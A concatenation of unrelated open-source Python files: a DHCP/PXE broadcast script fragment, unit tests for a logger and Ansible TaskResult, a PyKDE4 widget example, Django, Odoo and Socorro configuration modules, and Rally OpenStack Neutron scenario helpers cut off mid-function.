msg="0101060029104a2e0004800000000000000000000000000000000000"+MAC+"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363350101371801020305060b0c0d0f1011122b363c438081828384858687390204ec611100000000003030323132383130344132455d0200005e030102013c20505845436c69656e743a417263683a30303030303a554e44493a303032303031ff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
# send data
Conn.sendto(msg.decode("hex"),(BCAST_IP,SERVER_PORT))
Conn.close()
# Receive response
rConn=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rConn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
rConn.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
#rConn.setsockopt(socket.SOL_SOCKET,IN.SO_BINDTODEVICE,LISTEN_DEV+'\0')
rConn.bind(('',LOCAL_PORT))
while True:
msg,addr = rConn.recvfrom(MSG_SIZE)
print "Answer from "+addr[0]
#received = rConn.recvfrom(MSG_SIZE)
# Process response
# Normally - this is the end.
###########################################################
# And close the connection
Conn.close()
######################################################
# History
# 0.2.8 - May 31, 2017 - DHCP initial version
|
gmariotti/lassim
|
refs/heads/master
|
test/utilities/test_logger_setup.py
|
1
|
import logging
import os
from unittest import TestCase
from utilities.logger_setup import LoggerSetup
__author__ = "Guido Pio Mariotti"
__copyright__ = "Copyright (C) 2016 Guido Pio Mariotti"
__license__ = "GNU General Public License v3.0"
__version__ = "0.1.0"
class TestMySetup(TestCase):
def setUp(self):
self.logfile = "test.log"
if os.path.isfile(self.logfile):
os.remove(self.logfile)
def tearDown(self):
if os.path.isfile(self.logfile):
os.remove(self.logfile)
def test_LoggerWithFileLog(self):
setup = LoggerSetup()
setup.set_file_log(level=logging.INFO, logfile=self.logfile)
log_message = "log test"
logger = logging.getLogger(__name__)
logger.info(log_message)
expected = [log_message, "INFO"]
with open(self.logfile) as logfile:
# first two lines contains the change in level of the logger
line = logfile.readline()
line = logfile.readline()
line = logfile.readline()
for message in expected:
self.assertIn(message, line,
"{} not found in line {}".format(message, line))
|
KDE/pykde4
|
refs/heads/master
|
examples/kdeuiExamples/kdatepicker.py
|
1
|
from PyQt4.QtCore import SIGNAL, Qt
from PyQt4.QtGui import QLabel
from PyKDE4.kdecore import i18n
from PyKDE4.kdeui import KVBox, KHBox, KDatePicker, KDateWidget
helpText = """Date selection widgets - KDatePicker and KDateWidget - provide widgets for calendar
date input.
KDatePicker emits two types of signals, either dateSelected() or dateEntered().
A line edit allows the user to select a date directly by entering numbers like
19990101 or 990101 into KDatePicker."""
class MainFrame(KVBox):
def __init__(self, parent=None):
KVBox.__init__(self, parent)
self.help = QLabel (i18n (helpText), self)
self.layout ().setAlignment (self.help, Qt.AlignHCenter | Qt.AlignTop)
self.setSpacing (40)
hBox = KHBox (self)
vBox1 = KVBox (hBox)
vBox2 = KVBox (hBox)
hBox.layout ().setAlignment (vBox1, Qt.AlignHCenter)
hBox.layout ().setAlignment (vBox2, Qt.AlignHCenter)
vBox1.setMargin (20)
vBox2.setSpacing (20)
self.datePickerLabel = QLabel ("KDatePicker", vBox1)
self.datePicker = KDatePicker(vBox2)
self.datePicker.setFixedSize (400, 200)
self.other = QLabel('KDateWidget', vBox1)
vBox1.layout ().setAlignment (self.other, Qt.AlignBottom)
self.dateDisplay = KDateWidget(vBox2)
self.connect(self.datePicker, SIGNAL('dateChanged(QDate)'),
self.dateDisplay.setDate)
# This example can be run standalone
if __name__ == '__main__':
import sys
from PyKDE4.kdecore import KCmdLineArgs, KAboutData, KLocalizedString, ki18n
from PyKDE4.kdeui import KApplication, KMainWindow
class MainWin (KMainWindow):
def __init__ (self, *args):
KMainWindow.__init__ (self)
self.resize(640, 500)
self.setCentralWidget (MainFrame (self))
#-------------------- main ------------------------------------------------
appName = "kdatepicker"
catalog = ""
programName = ki18n ("kdatepicker")
version = "1.0"
description = ki18n ("KDatePicker Example")
license = KAboutData.License_GPL
copyright = ki18n ("(c) 2006 Troy Melhase")
text = ki18n ("none")
homePage = "www.riverbankcomputing.com"
bugEmail = "jbublitz@nwinternet.com"
aboutData = KAboutData (appName, catalog, programName, version, description,
license, copyright, text, homePage, bugEmail)
aboutData.addAuthor (ki18n ("Troy Melhase"), ki18n ("original concept"))
aboutData.addAuthor (ki18n ("Jim Bublitz"), ki18n ("pykdedocs"))
KCmdLineArgs.init (sys.argv, aboutData)
app = KApplication ()
mainWindow = MainWin (None, "main window")
mainWindow.show()
app.connect (app, SIGNAL ("lastWindowClosed ()"), app.quit)
app.exec_ ()
|
boooka/GeoPowerOff
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/contrib/formtools/wizard/storage/__init__.py
|
95
|
from django.utils.module_loading import import_string
from django.contrib.formtools.wizard.storage.base import BaseStorage
from django.contrib.formtools.wizard.storage.exceptions import (
MissingStorage, NoFileStorageConfigured)
__all__ = [
"BaseStorage", "MissingStorage", "NoFileStorageConfigured", "get_storage",
]
def get_storage(path, *args, **kwargs):
try:
storage_class = import_string(path)
except ImportError as e:
raise MissingStorage('Error loading storage: %s' % e)
return storage_class(*args, **kwargs)
|
slevenhagen/odoo
|
refs/heads/8.0
|
addons/l10n_uy/__openerp__.py
|
260
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Openerp.uy <openerp.uy@lists.launchpad.net>
# Proyecto de Localización de OperERP para Uruguay
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Uruguay - Chart of Accounts',
'version': '0.1',
'author': 'Uruguay l10n Team & Guillem Barba',
'category': 'Localization/Account Charts',
'website': 'https://launchpad.net/openerp-uruguay',
'description': """
General Chart of Accounts.
==========================
Provide Templates for Chart of Accounts, Taxes for Uruguay.
""",
'license': 'AGPL-3',
'depends': ['account'],
'data': [
'account_types.xml',
'taxes_code_template.xml',
'account_chart_template.xml',
'taxes_template.xml',
'l10n_uy_wizard.xml',
],
'demo': [],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Qalthos/ansible
|
refs/heads/devel
|
test/units/executor/test_task_result.py
|
113
|
# (c) 2016, James Cammarata <jimi@sngx.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat import unittest
from units.compat.mock import patch, MagicMock
from ansible.executor.task_result import TaskResult
class TestTaskResult(unittest.TestCase):
def test_task_result_basic(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test loading a result with a dict
tr = TaskResult(mock_host, mock_task, dict())
# test loading a result with a JSON string
with patch('ansible.parsing.dataloader.DataLoader.load') as p:
tr = TaskResult(mock_host, mock_task, '{}')
def test_task_result_is_changed(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no changed in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_changed())
# test with changed in the result
tr = TaskResult(mock_host, mock_task, dict(changed=True))
self.assertTrue(tr.is_changed())
# test with multiple results but none changed
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_changed())
# test with multiple results and one changed
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(changed=False), dict(changed=True), dict(some_key=False)]))
self.assertTrue(tr.is_changed())
def test_task_result_is_skipped(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no skipped in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_skipped())
# test with skipped in the result
tr = TaskResult(mock_host, mock_task, dict(skipped=True))
self.assertTrue(tr.is_skipped())
# test with multiple results but none skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_skipped())
# test with multiple results and one skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(skipped=False), dict(skipped=True), dict(some_key=False)]))
self.assertFalse(tr.is_skipped())
# test with multiple results and all skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(skipped=True), dict(skipped=True), dict(skipped=True)]))
self.assertTrue(tr.is_skipped())
# test with multiple squashed results (list of strings)
# first with the main result having skipped=False
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=["a", "b", "c"], skipped=False))
self.assertFalse(tr.is_skipped())
# then with the main result having skipped=True
tr = TaskResult(mock_host, mock_task, dict(results=["a", "b", "c"], skipped=True))
self.assertTrue(tr.is_skipped())
def test_task_result_is_unreachable(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no unreachable in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_unreachable())
# test with unreachable in the result
tr = TaskResult(mock_host, mock_task, dict(unreachable=True))
self.assertTrue(tr.is_unreachable())
# test with multiple results but none unreachable
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_unreachable())
# test with multiple results and one unreachable
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(unreachable=False), dict(unreachable=True), dict(some_key=False)]))
self.assertTrue(tr.is_unreachable())
def test_task_result_is_failed(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no failed in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_failed())
# test failed result with rc values (should not matter)
tr = TaskResult(mock_host, mock_task, dict(rc=0))
self.assertFalse(tr.is_failed())
tr = TaskResult(mock_host, mock_task, dict(rc=1))
self.assertFalse(tr.is_failed())
# test with failed in result
tr = TaskResult(mock_host, mock_task, dict(failed=True))
self.assertTrue(tr.is_failed())
# test with failed_when in result
tr = TaskResult(mock_host, mock_task, dict(failed_when_result=True))
self.assertTrue(tr.is_failed())
def test_task_result_no_log(self):
mock_host = MagicMock()
mock_task = MagicMock()
# no_log should remove secrets
tr = TaskResult(mock_host, mock_task, dict(_ansible_no_log=True, secret='DONTSHOWME'))
clean = tr.clean_copy()
self.assertTrue('secret' not in clean._result)
def test_task_result_no_log_preserve(self):
mock_host = MagicMock()
mock_task = MagicMock()
# no_log should not remove presrved keys
tr = TaskResult(
mock_host,
mock_task,
dict(
_ansible_no_log=True,
retries=5,
attempts=5,
changed=False,
foo='bar',
)
)
clean = tr.clean_copy()
self.assertTrue('retries' in clean._result)
self.assertTrue('attempts' in clean._result)
self.assertTrue('changed' in clean._result)
self.assertTrue('foo' not in clean._result)
|
lonnen/socorro
|
refs/heads/master
|
webapp-django/crashstats/urls.py
|
1
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
from django.conf import settings
from django.conf.urls import include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic.base import RedirectView
from django.views.static import serve
from crashstats.manage import admin_site
from crashstats.crashstats.monkeypatches import patch
patch()
handler500 = 'crashstats.crashstats.views.handler500'
handler404 = 'crashstats.crashstats.views.handler404'
urlpatterns = [
url(r'^(?P<path>contribute\.json)$', serve, {
'document_root': os.path.join(settings.ROOT, '..'),
}),
url(r'^(?P<path>favicon\.ico)$', serve, {
'document_root': os.path.join(settings.ROOT, 'crashstats', 'crashstats', 'static', 'img'),
}),
url(r'', include('crashstats.crashstats.urls', namespace='crashstats')),
url(r'', include('crashstats.supersearch.urls', namespace='supersearch')),
url(r'', include('crashstats.exploitability.urls', namespace='exploitability')),
url(r'', include('crashstats.monitoring.urls', namespace='monitoring')),
url(r'^signature/', include('crashstats.signature.urls', namespace='signature')),
url(r'^topcrashers/', include('crashstats.topcrashers.urls', namespace='topcrashers')),
url(r'^sources/', include('crashstats.sources.urls', namespace='sources')),
url(r'^api/tokens/', include('crashstats.tokens.urls', namespace='tokens')),
url(r'^api/', include('crashstats.api.urls', namespace='api')),
# redirect all symbols/ requests to Tecken
url(r'^symbols/.*',
RedirectView.as_view(url='https://symbols.mozilla.org/'),
name='redirect-to-tecken'),
url(r'^profile/', include('crashstats.profile.urls', namespace='profile')),
url(r'^documentation/', include('crashstats.documentation.urls', namespace='documentation')),
# Static pages in Django admin
url(r'^siteadmin/', include('crashstats.manage.admin_urls', namespace='siteadmin')),
# Django-model backed pages in Django admin
url(r'^siteadmin/', admin_site.site.urls),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
# In DEBUG mode, serve media files through Django.
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
|
vganapath/rally
|
refs/heads/master
|
rally/plugins/openstack/scenarios/neutron/utils.py
|
1
|
# Copyright 2014: Intel Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from rally.common.i18n import _
from rally.common import logging
from rally import exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import atomic
LOG = logging.getLogger(__name__)
class NeutronScenario(scenario.OpenStackScenario):
"""Base class for Neutron scenarios with basic atomic actions."""
SUBNET_IP_VERSION = 4
# TODO(rkiran): modify in case LBaaS-v2 requires
LB_METHOD = "ROUND_ROBIN"
LB_PROTOCOL = "HTTP"
LB_PROTOCOL_PORT = 80
HM_TYPE = "PING"
HM_MAX_RETRIES = 3
HM_DELAY = 20
HM_TIMEOUT = 10
def _get_network_id(self, network, **kwargs):
"""Get Neutron network ID for the network name.
param network: str, network name/id
param kwargs: dict, network options
returns: str, Neutron network-id
"""
networks = self._list_networks(atomic_action=False)
for net in networks:
if (net["name"] == network) or (net["id"] == network):
return net["id"]
msg = (_("Network %s not found.") % network)
raise exceptions.NotFoundException(message=msg)
@atomic.action_timer("neutron.create_network")
def _create_network(self, network_create_args):
"""Create neutron network.
:param network_create_args: dict, POST /v2.0/networks request options
:returns: neutron network dict
"""
network_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_network(
{"network": network_create_args})
@atomic.optional_action_timer("neutron.list_networks")
def _list_networks(self, **kwargs):
"""Return user networks list.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param kwargs: network list options
"""
return self.clients("neutron").list_networks(**kwargs)["networks"]
@atomic.action_timer("neutron.update_network")
def _update_network(self, network, network_update_args):
"""Update the network.
This atomic function updates the network with network_update_args.
:param network: Network object
:param network_update_args: dict, POST /v2.0/networks update options
:returns: updated neutron network dict
"""
network_update_args["name"] = self.generate_random_name()
body = {"network": network_update_args}
return self.clients("neutron").update_network(
network["network"]["id"], body)
@atomic.action_timer("neutron.delete_network")
def _delete_network(self, network):
"""Delete neutron network.
:param network: Network object
"""
self.clients("neutron").delete_network(network["id"])
@atomic.action_timer("neutron.create_subnet")
def _create_subnet(self, network, subnet_create_args, start_cidr=None):
"""Create neutron subnet.
:param network: neutron network dict
:param subnet_create_args: POST /v2.0/subnets request options
:returns: neutron subnet dict
"""
network_id = network["network"]["id"]
if not subnet_create_args.get("cidr"):
start_cidr = start_cidr or "10.2.0.0/24"
subnet_create_args["cidr"] = (
network_wrapper.generate_cidr(start_cidr=start_cidr))
subnet_create_args["network_id"] = network_id
subnet_create_args["name"] = self.generate_random_name()
subnet_create_args.setdefault("ip_version", self.SUBNET_IP_VERSION)
return self.clients("neutron").create_subnet(
{"subnet": subnet_create_args})
@atomic.action_timer("neutron.list_subnets")
def _list_subnets(self):
"""Returns user subnetworks list."""
return self.clients("neutron").list_subnets()["subnets"]
@atomic.action_timer("neutron.update_subnet")
def _update_subnet(self, subnet, subnet_update_args):
"""Update the neutron subnet.
This atomic function updates the subnet with subnet_update_args.
:param subnet: Subnet object
:param subnet_update_args: dict, PUT /v2.0/subnets update options
:returns: updated neutron subnet dict
"""
subnet_update_args["name"] = self.generate_random_name()
body = {"subnet": subnet_update_args}
return self.clients("neutron").update_subnet(
subnet["subnet"]["id"], body)
@atomic.action_timer("neutron.delete_subnet")
def _delete_subnet(self, subnet):
"""Delete neutron subnet
:param subnet: Subnet object
"""
self.clients("neutron").delete_subnet(subnet["subnet"]["id"])
@atomic.action_timer("neutron.create_router")
def _create_router(self, router_create_args, external_gw=False):
"""Create neutron router.
:param router_create_args: POST /v2.0/routers request options
:returns: neutron router dict
"""
router_create_args["name"] = self.generate_random_name()
if external_gw:
for network in self._list_networks():
if network.get("router:external"):
external_network = network
gw_info = {"network_id": external_network["id"],
"enable_snat": True}
router_create_args.setdefault("external_gateway_info",
gw_info)
return self.clients("neutron").create_router(
{"router": router_create_args})
@atomic.action_timer("neutron.list_routers")
def _list_routers(self):
"""Returns user routers list."""
return self.clients("neutron").list_routers()["routers"]
@atomic.action_timer("neutron.delete_router")
def _delete_router(self, router):
"""Delete neutron router
:param router: Router object
"""
self.clients("neutron").delete_router(router["router"]["id"])
@atomic.action_timer("neutron.update_router")
def _update_router(self, router, router_update_args):
"""Update the neutron router.
This atomic function updates the router with router_update_args.
:param router: dict, neutron router
:param router_update_args: dict, PUT /v2.0/routers update options
:returns: updated neutron router dict
"""
router_update_args["name"] = self.generate_random_name()
body = {"router": router_update_args}
return self.clients("neutron").update_router(
router["router"]["id"], body)
@atomic.action_timer("neutron.create_port")
def _create_port(self, network, port_create_args):
"""Create neutron port.
:param network: neutron network dict
:param port_create_args: POST /v2.0/ports request options
:returns: neutron port dict
"""
port_create_args["network_id"] = network["network"]["id"]
port_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_port({"port": port_create_args})
@atomic.action_timer("neutron.list_ports")
def _list_ports(self):
"""Return user ports list."""
return self.clients("neutron").list_ports()["ports"]
@atomic.action_timer("neutron.update_port")
def _update_port(self, port, port_update_args):
"""Update the neutron port.
This atomic function updates port with port_update_args.
:param port: dict, neutron port
:param port_update_args: dict, PUT /v2.0/ports update options
:returns: updated neutron port dict
"""
port_update_args["name"] = self.generate_random_name()
body = {"port": port_update_args}
return self.clients("neutron").update_port(port["port"]["id"], body)
@atomic.action_timer("neutron.delete_port")
def _delete_port(self, port):
"""Delete neutron port.
:param port: Port object
"""
self.clients("neutron").delete_port(port["port"]["id"])
@logging.log_deprecated_args(_("network_create_args is deprecated; "
"use the network context instead"),
"0.1.0", "network_create_args")
def _get_or_create_network(self, network_create_args=None):
"""Get a network from context, or create a new one.
This lets users either create networks with the 'network'
context, provide existing networks with the 'existing_network'
context, or let the scenario create a default network for
them. Running this without one of the network contexts is
deprecated.
:param network_create_args: Deprecated way to provide network
creation args; use the network
context instead.
:returns: Network dict
"""
if "networks" in self.context["tenant"]:
return {"network":
random.choice(self.context["tenant"]["networks"])}
else:
LOG.warning(_("Running this scenario without either the 'network' "
"or 'existing_network' context is deprecated"))
return self._create_network(network_create_args or {})
def _create_subnets(self, network,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=1):
"""Create <count> new subnets in the given network.
:param network: network to create subnets in
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:returns: List of subnet dicts
"""
return [self._create_subnet(network, subnet_create_args or {},
subnet_cidr_start)
for i in range(subnets_per_network)]
def _create_network_and_subnets(self,
network_create_args=None,
subnet_create_args=None,
subnets_per_network=1,
subnet_cidr_start="1.0.0.0/24"):
"""Create network and subnets.
:parm network_create_args: dict, POST /v2.0/networks request options
:parm subnet_create_args: dict, POST /v2.0/subnets request options
:parm subnets_per_network: int, number of subnets for one network
:parm subnet_cidr_start: str, start value for subnets CIDR
:returns: tuple of result network and subnets list
"""
network = self._create_network(network_create_args or {})
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start, subnets_per_network)
return network, subnets
def _create_network_structure(self, network_create_args=None,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=None,
router_create_args=None):
"""Create a network and a given number of subnets and routers.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:param router_create_args: dict, POST /v2.0/routers request options
:returns: tuple of (network, subnets, routers)
"""
network = self._get_or_create_network(network_create_args)
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start,
subnets_per_network)
routers = []
for subnet in subnets:
router = self._create_router(router_create_args or {})
self._add_interface_router(subnet["subnet"],
router["router"])
routers.append(router)
return (network, subnets, routers)
@atomic.action_timer("neutron.add_interface_router")
def _add_interface_router(self, subnet, router):
"""Connect subnet to router.
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").add_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.action_timer("neutron.remove_interface_router")
def _remove_interface_router(self, subnet, router):
"""Remove subnet from router
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").remove_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.optional_action_timer("neutron.create_loadbalancer")
def _create_loadbalancer(self, subnet_id, **lb_create_args):
"""Create LB loadbalancer(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"name": self.generate_random_name(),
"vip_subnet_id": subnet_id}
args.update(lb_create_args)
return self.clients("neutron").create_loadbalancer({"loadbalancer": args})
def _create_v2_loadbalancer(self, networks, **lb_create_args):
"""Create LB loadbalancer(v2)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
lb = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_lbs" %
len(subnets)):
for subnet_id in subnets:
lb.append(self._create_loadbalancer(
subnet_id, atomic_action=False, **lb_create_args))
return lb
@atomic.action_timer("neutron.delete_loadbalancer")
def _delete_v2_loadbalancer(self, lb):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_loadbalancer(lb)
@atomic.action_timer("neutron.create_listener")
def _create_v2_listener(self, lb, **listener_create_args):
"""Create Listener(lbaasv2)
:parm pool: dict, neutron lb-pool
:parm vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"loadbalancer_id": lb["loadbalancer"]["id"]}
args.update(listener_create_args)
return self.clients("neutron").create_listener({"listener": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_listener(self, listener):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_listener(listener)
@atomic.optional_action_timer("neutron.create_lbaas_pool")
def _create_v2_pool(self, listener, **pool_create_args):
"""Create LB pool(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_algorithm": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"listener_id": listener["listener"]["id"]}
args.update(pool_create_args)
return self.clients("neutron").create_lbaas_pool({"pool": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_pool(self, pool):
"""Delete loadbalancer pool.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_lbaas_pool(pool)
@atomic.optional_action_timer("neutron.create_lbaas_member")
def _create_v2_pool_member(self, subnet_id, pool, **mem_create_args):
"""Create LB pool member (v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"subnet_id": subnet_id,
"protocol_port": self.LB_PROTOCOL_PORT}
args.update(mem_create_args)
return self.clients("neutron").create_lbaas_member(pool["pool"]["id"], {"member": args})
@atomic.action_timer("neutron.delete_pool_member")
def _delete_v2_pool_member(self, member, pool):
"""Delete lbaas pool member.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_lbaas_member(member, pool)
@atomic.optional_action_timer("neutron.create_pool")
def _create_lb_pool(self, subnet_id, **pool_create_args):
"""Create LB pool(v1)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_method": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"subnet_id": subnet_id}
args.update(pool_create_args)
return self.clients("neutron").create_pool({"pool": args})
def _create_v1_pools(self, networks, **pool_create_args):
"""Create LB pools(v1)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
pools = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_pools" %
len(subnets)):
for subnet_id in subnets:
pools.append(self._create_lb_pool(
subnet_id, atomic_action=False, **pool_create_args))
return pools
@atomic.action_timer("neutron.list_pools")
def _list_v1_pools(self, **kwargs):
"""Return user lb pool list(v1)."""
return self.clients("neutron").list_pools(**kwargs)
@atomic.action_timer("neutron.delete_pool")
def _delete_v1_pool(self, pool):
"""Delete neutron pool.
:param pool: Pool object
"""
self.clients("neutron").delete_pool(pool["id"])
@atomic.action_timer("neutron.update_pool")
def _update_v1_pool(self, pool, **pool_update_args):
"""Update pool.
This atomic function updates the pool with pool_update_args.
:param pool: Pool object
:param pool_update_args: dict, POST /lb/pools update options
:returns: updated neutron pool dict
"""
pool_update_args["name"] = self.generate_random_name()
body = {"pool": pool_update_args}
return self.clients("neutron").update_pool(pool["pool"]["id"], body)
def _create_v1_vip(self, pool, **vip_create_args):
"""Create VIP(v1)
:parm pool: dict, neutron lb-pool
:parm vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"pool_id": pool["pool"]["id"],
"subnet_id": pool["pool"]["subnet_id"]}
args.update(vip_create_args)
return self.clients("neutron").create_vip({"vip": args})
@atomic.action_timer("neutron.list_vips")
def _list_v1_vips(self, **kwargs):
"""Return user lb vip list(v1)."""
return self.clients("neutron").list_vips(**kwargs)
@atomic.action_timer("neutron.delete_vip")
def _delete_v1_vip(self, vip):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_vip(vip["id"])
@atomic.action_timer("neutron.update_vip")
def _update_v1_vip(self, vip, **vip_update_args):
"""Updates vip.
This atomic function updates vip name and admin state
:param vip: Vip object
:param vip_update_args: dict, POST /lb/vips update options
:returns: updated neutron vip dict
"""
vip_update_args["name"] = self.generate_random_name()
body = {"vip": vip_update_args}
return self.clients("neutron").update_vip(vip["vip"]["id"], body)
@atomic.action_timer("neutron.create_floating_ip")
def _create_floatingip(self, floating_network, **floating_ip_args):
"""Create floating IP with floating_network.
param: floating_network: str, external network to create floating IP
param: floating_ip_args: dict, POST /floatingips create options
returns: dict, neutron floating IP
"""
floating_network_id = self._get_network_id(
floating_network)
args = {"floating_network_id": floating_network_id}
args.update(floating_ip_args)
return self.clients("neutron").create_floatingip({"floatingip": args})
@atomic.action_timer("neutron.list_floating_ips")
def _list_floating_ips(self, **kwargs):
"""Return floating IPs list."""
return self.clients("neutron").list_floatingips(**kwargs)
@atomic.action_timer("neutron.delete_floating_ip")
def _delete_floating_ip(self, floating_ip):
"""Delete floating IP.
:param: dict, floating IP object
"""
return self.clients("neutron").delete_floatingip(floating_ip["id"])
@atomic.optional_action_timer("neutron.create_healthmonitor")
def _create_v1_healthmonitor(self, **healthmonitor_create_args):
"""Create LB healthmonitor.
This atomic function creates healthmonitor with the provided
healthmonitor_create_args.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param healthmonitor_create_args: dict, POST /lb/healthmonitors
:returns: neutron healthmonitor dict
"""
args = {"type": self.HM_TYPE,
